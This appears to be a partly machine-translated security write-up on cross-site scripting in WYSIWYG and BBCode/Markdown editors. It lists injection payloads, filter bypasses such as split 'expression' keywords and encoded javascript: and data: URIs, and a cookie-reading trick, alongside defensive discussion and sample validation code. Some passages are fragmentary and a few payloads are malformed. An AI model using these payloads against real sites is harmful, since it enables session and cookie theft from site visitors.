h4cksc4n.files.wordpress.com · Web view: here, from the CKEditor on the ebay site.

Discovering cross-site scripting (XSS) vulnerabilities, one of the most common classes of vulnerability in web applications: an attacker who finds one can obtain a victim's cookies and, with them, reach sensitive information such as the target site's control panel, or use the vulnerable site to serve MALWARE to its visitors.


( XSS )

XSS Vulnerable In web application


Contents:

1. wysiwyg

2. Magento Commerce Bug

3. WYSIWYG

4. WYSIWYG

5. ( Attack Vector #1 )

6. ( Attack Vector #2 )

7. Attribute Context

8. URL Context

9. Twitter Translations

10. Style Context

11. WYSIWYG

12. XSS

13.

14. Data URL

15.

WYSIWYG: What You See Is What You Get.

XSS in WYSIWYG editors, Enterprise products included: TinyMCE, EditLive, Lithium, Jive, TinyMCE PHP HTML Editor, markItUp, FreeTextBox, Froala Editor, elRTE, CKEditor ...

Magento Commerce: an XSS in its WYSIWYG editor, 1000 $ (http://magento.com/security)

2051362 334227 448284 http://www.magentocommerce.com/boards/

BBCode: Bold is [b], colour is [color=blue], size is [size=4]; the tags are translated to html 4:

[b][size=4][color=blue]bold[/size][/color][/b]

The resulting HTML, as rendered in the Preview: bold

Trying document.cookie gives "Removed" in the output:

[removed]: the XSS payload was filtered.

The word Removed points to CodeIgniter's CI_Security class (PHP), whose XSS filter replaces document.cookie with [removed].

CodeIgniter is open source on GitHub (PHP), so the filter's source can be read directly. 264038

[b][size=4][color=blue]bold[/size][/color][/b]

[b/onmouseover=alert(1)][size=4][color=blue]bold[/size][/color][/b]

And/or

[b onmouseover=alert(1)][size=4][color=blue]bold[/size][/color][/b]

" [b/onmouseover=alert(1)]"

bold


" [b onmouseover=alert(1)]"

bold

The [url] tag becomes an HTML link whose URL may be any URI, including a JAVASCRIPT or DATA URI:

[url=http://www.bbcnews.com]Top Stories[/url]

[url=javascript:alert(1)]Top Stories[/url]

DATA URI

[url=data:text/html;base64.PHN2Zy9vbmxvYWQ9YwxIcnQoMik+]Top Stories[/url]

URL

alert(1)]Top Stories


Top Stories

Only absolute URLs (http:// or https://) and Relative URLs are expected here; CodeIgniter replaced the javascript: scheme with "Removed", and the same happens with the DATA URL.

CSS EXPRESSION (a JavaScript EXPRESSION inside a style value, IE): starting from the normal BBCode

[b][size=4][color=blue]bold[/size][/color][/b]

replace the colour value with an EXPRESSION:

[b][size=4][color=width:expression(alert(1))]bold[/size][/color][/b]

Output: alert(1))]bold, with the keyword replaced by "Removed".

[b][size=4][color=blue]bold[/size][/color][/b]

[b][size=4][color=width:expre/**/ssion(alert(1))]bold[/size][/color][/b]

bold

CodeIgniter replaced "expression" with Removed: expression is on codeIgniter's black-list for Style values, and splitting it as expre/**/ssion slips past the black-list.

The [color] tag is rendered as an HTML Color style, so the Style context is reachable:

[b][size=4][color=blue]bold[/size][/color][/b]

[b][style=width:expre/**/ssion(alert(1))]bold [/style] [/b]

bold

A style (or class) tag is accepted as well, which puts the input directly in the Style Context:

[b][style=style=width:expre/**/ssion(alert(1))]bold[/style][/b]]

bold

The same through the class attribute (Class) carrying a style value:

[b][style="style=width:expre/**/ssion(alert(1))]bold[/style][/b]]

bold

bold

In IE7 an eventHandler can be smuggled through the style attribute:

[b][style="onmouseover="alert(cookie);]bold[/style][/b]

cookie is used instead of document.cookie because CodeIgniter replaces document.cookie with "removed"; inside an inline handler the bare name cookie still resolves to the document's cookie, so the xss reads it anyway.

https://support.mozilla.org/en-US/kb/cookies-information-websites-store-on-your-computer

The PHPSESSIONID session cookie, the HTTPONLY and SECURE flags, and the 2014 vBulletin cases (ubuntu forums, Apple Developers forums):

md5 hashes, the www-data user, vBulletin:

https://www.youtube.com/watch?v=blDzqctIU2E

https://www.youtube.com/watch?v=TYcP3FbK3X4

xss in wordpress 3.x:

https://www.youtube.com/watch?v=7K15yzSeIGo

Content Management Systems (CMS) such as Drupal, WordPress, Magento, JetSpeed ....

Where user input reaches a WYSIWYG editor's output:

URL

ID, CLASS

the WYSIWYG content itself

( Attack Vector #1 ) :

http://xssplayground.net23.net/xss%22onmouseover=%22alert(1);%20imagefile.svg

http://xssplayground.net23.net/xss"onmouseover="alert(1); imagefile.svg

The injected text ends up in the src attribute of the img tag. Because the server URL-decodes the value before inserting it (the URL Decoder, Explicit Server Side Decoding), the %22 sequences become literal " characters that close the attribute:

http://xssplayground.net23.net/xss%22onmouseover=%22alert(1);%20imagefile.svg?"onmouseover="alert(1)

URL field: the dialog shows !Image URL Goes Here!; the decoder turns the encoded " back into a literal quote, so the value would have to be encoded again before it is written into the attribute.

Stored XSS

This is Stored XSS rather than reflected XSS; the same kind of Stored xss was found in kindle direct Publishing (break context).

( Attack Vector #2 ) :

The URL of an IMG or A element can also be a Data:image URI containing SVG, which is XML:

data:image/svg+xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz4gCjwhRE9DVFlQRSBodG1sIFsgCjwhRU5USVRZIHhzcyAiJiM2MDtzY3JpcHQmIzYyO2NvbmZpcm0obG9jYXRpb24pJiM2MDsvc2NyaXB0JiM2MjsiPiAKXT4gCjxodG1sIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hodG1sIj4gCjxoZWFkPiAKPHRpdGxlPlhNTCBYU1MgVmVjdG9yPC90aXRsZT4gCjwvaGVhZD4gCjxib2R5PiAKJnhzczsgCjwvYm9keT4gCjwvaHRtbD4=

The extension does not have to be svg; jpg or png names work as well, e.g. Torjan_horse.jpg:

http://www.ieee-security.org/images/new-web/Torjan_horse.jpg?onmouseover=alert(1)

http://xssplayground.net23.net/xss%22onmouseover=%22alert(1);%20imagefile.svg

Other attributes of the image, Alt, id and class, are injection points too (ALT):

Jive

The img tag in firefox 33.0:

Attribute Context

Two sub-contexts:

// Context: attribute Name

// Context: attribute Value

JAVASCRIPT URL

In xhtml/XHTML the usual injection attributes are alt, class, id and src.

IE8

Github

Online

URL Context

URL context injection points: LOCATION, form Action. Impact: XSS, CSRF, SSRF.

Schemes and encodings tried:

javascript: URI

Javascript URL with encoding (Obfuscation): URL encoding, HTML5 entity Encoding, Hex Encoding, decimal Encoding

Data URI

Data-Base64 URL: with Base64 the URI's data is hidden (100)

Vbscript

onmouseover=alert(1)

FreeTextBox, a WYSIWYG editor for Asp.net.

FreeTextBox

PHP HTML Editor (Liberal.ca), PHP and JQUERY editors, Joomla and Dojo (the Joomla Dojo Editor), html editors for Asp.net / Asp such as Cute Editor (10000, 60, XSS, 10000).

Web Wiz and EditLive: https://www.webwiz.co.uk/companyinfo/customer-testimonials.htm

MarkitUp

http://ephox.com/customers

Twitter Translations

https://twitter.com/ is turned into a link automatically!

[Tiwtter](https://twitter.com/)

twitter

Markdown syntax: [] holds the link text (Tiwtter), () holds the URL:

[Tiwtter](javascript:alert(1))

twitter

Twitter

Also tried: Data URI, vbscript URI, URL encoding and html encoding:

[twitter](javascript:alert(1))

twitter

Amp entity (html encoding) and URL encoding:

[Tiwtter](javascript:alert%281%29)

twitter

Many WYSIWYG editors rely on 3rd party MarkDown libraries:

http://daringfireball.net/projects/markdown/dingus

Style Context

CSS Style Context: the injection lands in a style attribute or style element, which exists in html as well as in xml and xslt (Online demos are available).

Payloads for this context:

URI, ie Expression in Css

hex encoding, decimal encoding, html encoding (ie)

backslash (\) escapes, xss

CKEditor on ebay

tinyMCE blocks Expression but not Expr/**/ession, which ie still evaluates as an Expression

URL DATA URI

data:text/html;base64.PHN2Zy9vbmxvYWQ9YwxIcnQoMik+

xss innerHTML

onmouseover=alert(1)

(IE 8, innerHTML):

div layer

click

:

Reference: mXSS Attacks: Attacking well-secured web-applications by using innerHTML Mutations (Heiderich et al., ACM CCS 2013)

WYSIWYG (Attacking Insert/Edit/Upload File Feature of WYSIWYG)

Drag-and-drop upload: the dropped file's name is reflected into the page.

XSS

IMPERAVI Redactor

http://imperavi.com/redactor/

XSS Froala

Demo(Issue Fixed)

http://jsfiddle.net/7qgt9wrw/3/

HTTPONLY HTTP / HTTPS

PAYPAL

Froala :

javascript:alert(1) data:text/html;base64.PHN2Zy9vbmxvYWQ9YwxIcnQoMik+

http://www.ieee-security.org/images/new-web/Torjan_horse.jpg?onmouseover=alert(1)

The image title is written into the page with innerHTML:

onmouseover=alert(1)

WYSIWYG (Attacking Insert video Feature of Wysiwyg Editors)

The video is inserted as an Object/embed element, where onmouseover can be injected.

Youtube Froala Raptor


object , embed HTML

Protection against XSS:

HttpOnly flag

plugin

HttpOnly does not stop AJAX.

HttpOnly only blocks reading the cookie through the document.cookie Dom Property; the browser still attaches it to AJAX requests.

AJAX (GET or POST) requests issued by the injected script therefore run with the victim's session.

So AJAX-based attacks work whether or not HttpOnly is set.

https://www.isecur1ty.org/%D8%B4%D8%B1%D8%AD-%D8%AB%D8%BA%D8%B1%D8%A7%D8%AA-blind-xss

DOM-based XSS:

https://www.security4arabs.com/2014/01/12/dombased-xss-vulnerabilities

The Secure flag

With the Secure flag the cookie is sent only over https, which prevents sidejacking of the session id cookie on sites served over both http and https; the price is the CPU spent on https.

XSS 1000$

http://demo.chmsoftware.com/7fc785c6bd26b49d7a7698a7518a73ed/

81570 catch all

Three filters that look sound but fail:

1. Quote replacement:

str_replace($bad_chars, $safe_chars, $input): each character of $bad_chars found in $input is replaced by the matching entry of $safe_chars, so " and ' become their html-encoded strings.

The same quote in other encodings, each tested against the filter:

http://jsfiddle.net/9t8UM/3/

Baseline output: divlayer

Hard coded double quotes in order to break the attribute context: divlayer

Decimal Encoded Double Quotes: divlayer

Hex Encoded Double Quotes: divlayer

URL Encoded Double Quotes: divlayer

HTML5 Encoded Double Quotes: divlayer

Unicode Encoded Double Quotes: divlayer

Whether an encoded quote gets through depends on what the application decodes after the filter has run (Explicit Server Side Decoding): the filter only sees the literal character, so any encoding that is decoded later bypasses it.
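As an added illustration of why filter 1 fails (this is not code from the original slides): a Python model of a str_replace-style quote filter followed by Explicit Server Side Decoding, run against the encoded double-quote variants listed above, beside the corrected order (decode to canonical form first, then escape for the attribute context). The attribute template, the "divlayer" element and the probe values are constructed for the example.

```python
import html
from html.parser import HTMLParser
from urllib.parse import unquote

# Constructed template: the user value lands inside a double-quoted attribute
# of the "divlayer" element, so a raw " closes the attribute early.
TEMPLATE = '<div id="divlayer" title="{value}"></div>'

# Encoded forms of the double quote from the filter-1 test list above, each
# wrapped in a constructed probe that tries to start a new attribute named "b".
VARIANTS = [
    ("hard-coded double quotes", 'a" b="c'),
    ("decimal encoded", 'a&#34; b=&#34;c'),
    ("hex encoded", 'a&#x22; b=&#x22;c'),
    ("URL encoded", 'a%22 b=%22c'),
    ("HTML5 named entity", 'a&quot; b=&quot;c'),
    # Only meaningful if the value later reaches a JavaScript context; an
    # HTML attribute parser does not interpret \u escapes.
    ("JavaScript unicode escape", 'a\\u0022 b=\\u0022c'),
]


def naive_filter(value: str) -> str:
    """Filter 1 from the slides: str_replace($bad_chars, $safe_chars, $input)."""
    bad_chars = ['"', "'"]
    safe_chars = ["&quot;", "&#39;"]
    for bad, safe in zip(bad_chars, safe_chars):
        value = value.replace(bad, safe)
    return value


def explicit_server_side_decode(value: str) -> str:
    """Models the application's own decoding step: URL-decode, then entity-decode."""
    return html.unescape(unquote(value))


def vulnerable_render(value: str) -> str:
    """Wrong order: filter first, decode afterwards (the decoder undoes the filter)."""
    return TEMPLATE.format(value=explicit_server_side_decode(naive_filter(value)))


def hardened_render(value: str) -> str:
    """Right order: decode to the canonical form, then escape for the attribute context."""
    decoded = explicit_server_side_decode(value)
    return TEMPLATE.format(value=html.escape(decoded, quote=True))


class _DivAttrs(HTMLParser):
    """Collects the attributes a browser-side parser would see on the div."""

    def __init__(self) -> None:
        super().__init__()
        self.attrs: dict = {}

    def handle_starttag(self, tag, attrs):
        if tag == "div":
            self.attrs = dict(attrs)


def parsed_attributes(rendered: str) -> dict:
    parser = _DivAttrs()
    parser.feed(rendered)
    return parser.attrs


def attribute_broken(rendered: str) -> bool:
    """True when the probe escaped the title attribute and created attribute "b"."""
    return "b" in parsed_attributes(rendered)


def run_audit() -> dict:
    """Returns {label: (vulnerable_broken, hardened_broken)} for every variant."""
    return {
        label: (attribute_broken(vulnerable_render(v)), attribute_broken(hardened_render(v)))
        for label, v in VARIANTS
    }


if __name__ == "__main__":
    for label, (vuln, hard) in run_audit().items():
        print(f"{label:28s} vulnerable={vuln!s:5} hardened={hard}")
```

Every HTML- or URL-encoded variant, and even the plain quote, breaks the attribute in the vulnerable order because the decoder runs after the filter; in the hardened order the decoded quote is escaped once, at the point where the value enters the attribute, so the title attribute keeps the literal quotes and no new attribute appears.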

2. Style context filter:

The filter strips " and ', the ie expression keyword, backslashes (\\), < and the word style. The test form:

Injection here

alert(1)

: ;

3. URL Context filter:

Only http, https and ftp followed by :// are allowed, and ", ', \ are stripped (http://jsfiddle.net/hfot8ruq/).

The filter pipeline, input and output:

This is normal text - and this is bold text.

This is normal text - and this is bold text.

Output Reflects Here:

Filter has catch your awesome vector ... Try hard :(

data:image/svg+xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz4gCjwhRE9DVFlQRSBodG1sIFsgCjwhRU5USVRZIHhzcyAiJiM2MDtzY3JpcHQmIzYyO2NvbmZpcm0obG9jYXRpb24pJiM2MDsvc2NyaXB0JiM2MjsiPiAKXT4gCjxodG1sIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hodG1sIj4gCjxoZWFkPiAKPHRpdGxlPlhNTCBYU1MgVmVjdG9yPC90aXRsZT4gCjwvaGVhZD4gCjxib2R5PiAKJnhzczsgCjwvYm9keT4gCjwvaHRtbD4=


Data URL

An http/https response declares a Content-type (mime/type: binary, html, xml, YAML, ...) and a Character set (charset=UTF-8), which decides how ascii code and non-ascii code are interpreted.

A Data URL carries the same information inline:

data:[<mediatype>][;base64],<data>

mediatype is the mime/type and defaults to text/plain;charset=US-ASCII; the data part is URL-encoded (Hex encoding) unless ;base64 is given. Example with an svg:

data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 512 512'%3E%3Cpath d='M224%20387.814V512L32 320l192-192v126.912C447.375 260.152 437.794 103.016 380.93 0 521.287 151.707 491.48 394.785 224 387.814z'/%3E%3C/svg%3E

(SVG; the DOCTYPE references svg11.dtd)

URL Encoding

%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20viewBox%3D%220%200%20512%20512%22%3E%3Cpath%20d%3D%22M224%20387.814V512L32%20320l192-192v126.912C447.375%20260.152%20437.794%20103.016%20380.93%200%20521.287%20151.707%20491.48%20394.785%20224%20387.814z%22%2F%3E%3C%2Fsvg%3E

base64 Encoding

PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHZpZXdCb3g9IjAgMCA1MTIgNTEyIj48cGF0aCBkPSJNMjI0IDM4Ny44MTRWNTEyTDMyIDMyMGwxOTItMTkydjEyNi45MTJDNDQ3LjM3NSAyNjAuMTUyIDQzNy43OTQgMTAzLjAxNiAzODAuOTMgMCA1MjEuMjg3IDE1MS43MDcgNDkxLjQ4IDM5NC43ODUgMjI0IDM4Ny44MTR6Ii8+PC9zdmc+

The same SVG as a DATA URL with base64:

data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHZpZXdCb3g9IjAgMCA1MTIgNTEyIj48cGF0aCBkPSJNMjI0IDM4Ny44MTRWNTEyTDMyIDMyMGwxOTItMTkydjEyNi45MTJDNDQ3LjM3NSAyNjAuMTUyIDQzNy43OTQgMTAzLjAxNiAzODAuOTMgMCA1MjEuMjg3IDE1MS43MDcgNDkxLjQ4IDM5NC43ODUgMjI0IDM4Ny44MTR6Ii8+PC9zdmc+

and as a DATA URL with URL Encoding:

data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20viewBox%3D%220%200%20512%20512%22%3E%3Cpath%20d%3D%22M224%20387.814V512L32%20320l192-192v126.912C447.375%20260.152%20437.794%20103.016%20380.93%200%20521.287%20151.707%20491.48%20394.785%20224%20387.814z%22%2F%3E%3C%2Fsvg%3E
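An added parser and builder for the data URL grammar above, written for this page (not code from the original slides): it implements data:[<mediatype>][;base64],<data>, round-trips the SVG shown above through both the URL-encoded and the base64 form, and shows the check an editor's insert-image feature should run before accepting a data URL: allow only raster image media types and confirm that the decoded bytes begin with that format's signature, so a base64 body cannot hide an SVG (XML) or HTML document behind an image-looking URL. The allow-list, its magic bytes and the sample PNG header are constructed for the example.

```python
import base64
import binascii
import re
from urllib.parse import quote, unquote_to_bytes

# The SVG the slides encode three ways (plain, URL-encoded, base64).
SVG = ('<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 512 512">'
       '<path d="M224 387.814V512L32 320l192-192v126.912C447.375 260.152 '
       '437.794 103.016 380.93 0 521.287 151.707 491.48 394.785 224 387.814z"/></svg>')

# The two encoded data URLs exactly as they appear on the slides.
PAGE_BASE64_URL = (
    "data:image/svg+xml;base64,"
    "PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHZpZXdCb3g9IjAgMCA1MTIgNTEyIj48cGF0aCBkPSJN"
    "MjI0IDM4Ny44MTRWNTEyTDMyIDMyMGwxOTItMTkydjEyNi45MTJDNDQ3LjM3NSAyNjAuMTUyIDQzNy43OTQgMTAzLjAxNiAz"
    "ODAuOTMgMCA1MjEuMjg3IDE1MS43MDcgNDkxLjQ4IDM5NC43ODUgMjI0IDM4Ny44MTR6Ii8+PC9zdmc+"
)
PAGE_URL_ENCODED = (
    "data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20viewBox%3D%220%20"
    "0%20512%20512%22%3E%3Cpath%20d%3D%22M224%20387.814V512L32%20320l192-192v126.912C447.375%20260.152"
    "%20437.794%20103.016%20380.93%200%20521.287%20151.707%20491.48%20394.785%20224%20387.814z%22%2F%3E"
    "%3C%2Fsvg%3E"
)

_DATA_URL = re.compile(r"^data:(?P<meta>[^,]*),(?P<body>.*)$", re.DOTALL)


def parse_data_url(url: str) -> dict:
    """Split a data: URL into mediatype, parameters, base64 flag and decoded bytes."""
    match = _DATA_URL.match(url)
    if not match:
        raise ValueError("not a data: URL")
    fields = [f.strip() for f in match.group("meta").split(";")]
    is_base64 = fields[-1].lower() == "base64"
    if is_base64:
        fields.pop()
    # RFC 2397: an omitted mediatype means text/plain;charset=US-ASCII.
    mediatype = (fields[0] if fields and fields[0] else "text/plain").lower()
    params = {}
    for item in fields[1:]:
        key, _, val = item.partition("=")
        if key:
            params[key.strip().lower()] = val.strip()
    if mediatype == "text/plain":
        params.setdefault("charset", "US-ASCII")
    body = match.group("body")
    if is_base64:
        data = base64.b64decode(unquote_to_bytes(body), validate=False)
    else:
        data = unquote_to_bytes(body)
    return {"mediatype": mediatype, "params": params, "base64": is_base64, "data": data}


def build_data_url(mediatype: str, data: bytes, use_base64: bool = True) -> str:
    """Inverse of parse_data_url; safe='' percent-encodes everything but unreserved chars."""
    if use_base64:
        return f"data:{mediatype};base64,{base64.b64encode(data).decode('ascii')}"
    return f"data:{mediatype},{quote(data, safe='')}"


# Constructed allow-list for an insert-image feature: raster formats only, each
# paired with the magic bytes its decoded body must begin with.
RASTER_SIGNATURES = {
    "image/png": (b"\x89PNG\r\n\x1a\n",),
    "image/jpeg": (b"\xff\xd8\xff",),
    "image/gif": (b"GIF87a", b"GIF89a"),
}


def check_image_data_url(url: str) -> tuple:
    """Returns (accepted, reason). image/svg+xml and text/html are XML/HTML and can
    carry script, so they are never in the allow-list; a body that does not match
    the declared raster type is rejected as well."""
    try:
        parsed = parse_data_url(url)
    except (ValueError, binascii.Error) as exc:
        return False, f"unparseable: {exc}"
    signatures = RASTER_SIGNATURES.get(parsed["mediatype"])
    if signatures is None:
        return False, f"media type {parsed['mediatype']} not allowed"
    if not any(parsed["data"].startswith(sig) for sig in signatures):
        return False, "body does not match declared image type"
    return True, "ok"


if __name__ == "__main__":
    png_url = build_data_url("image/png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 8)
    for url in (PAGE_BASE64_URL, PAGE_URL_ENCODED, png_url):
        print(check_image_data_url(url))
```

Decoding before checking is the point: the media type in the URL is attacker-controlled text, so the decision rests on the decoded bytes, and both the base64 and the percent-encoded form of the slides' SVG yield the same bytes and are refused for the same reason.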

svg is xml.

xml is used everywhere, from the cloud to office documents.

XML, like JSON (javascript object notation), is a data type and encoding for exchanging data.

Xml is a Markup language; xhtml is Markup, and html is markup too.

XML is also used by business-intelligence tools such as SpagoBI and Talend.

XML, XHTML, XSL and SVG each have their own DOCTYPE:

Common DOCTYPE Declarations

https://www.w3.org/QA/2002/04/valid-dtd-list.html

Base 64 Encoding

Base 10 uses 10 digits (0-9); base 16 uses 0-9 and A-F; base 64 uses A-Z, a-z and 0-9 plus + and /, all of them printable ascii code.

base 64 lets binary data (e.g. audio) travel as a string inside Json (java script object notation).

base 64 encoding and decoding also shows up in spamming and anti-spamming.

Json is often base 64 encoded, and base 64 inside Json is common.

Images (png, jpg, svg) can be base 64 encoded into a data URL, e.g. with PHP's base64_encode():

<script type="text/javascript"><![CDATA[
confirm(1);

// set element onclick event handler
window.onload = function () {
    var square = document.getElementById("square");

    // onclick event handler: toggle the square's fill colour
    square.onclick = function () {
        var color = this.getAttribute("fill");
        if (color == "#ff0000") {
            this.setAttribute("fill", "#0000ff");
        } else {
            this.setAttribute("fill", "#ff0000");
        }
    };
};
]]></script>

In svg the script sits in a CDATA section, so entities inside it are not parsed (likewise in xhtml).

Accessing Inline SVG


Detecting SVG support (script, then CSS):

// Tag the root element when the browser supports SVG images
if (document.implementation.hasFeature("http://www.w3.org/TR/SVG11/feature#Image", "1.1")) {
    document.documentElement.className = "svg";
}

/* Show the svg image only when the html element carries the svg class */
img { width: 18.75em; height: 6.25em; }
img.svg { display: none; }
img.png { display: inline; }
html.svg img.svg { display: inline; }
html.svg img.png { display: none; }

Displaying and detecting support for svg images:

http://voormedia.com/blog/2012/10/displaying-and-detecting-support-for-svg-images

Embedding Svg in html 5 with the object tag:

http://edutechwiki.unige.ch/en/Using_SVG_with_HTML5_tutorial#Embeding_SVG_in_HTML_5_with_the_object_tag

https://www.owasp.org/images/0/03/Mario_Heiderich_OWASP_Sweden_The_image_that_called_me.pdf

https://h4cksc4n.wordpress.com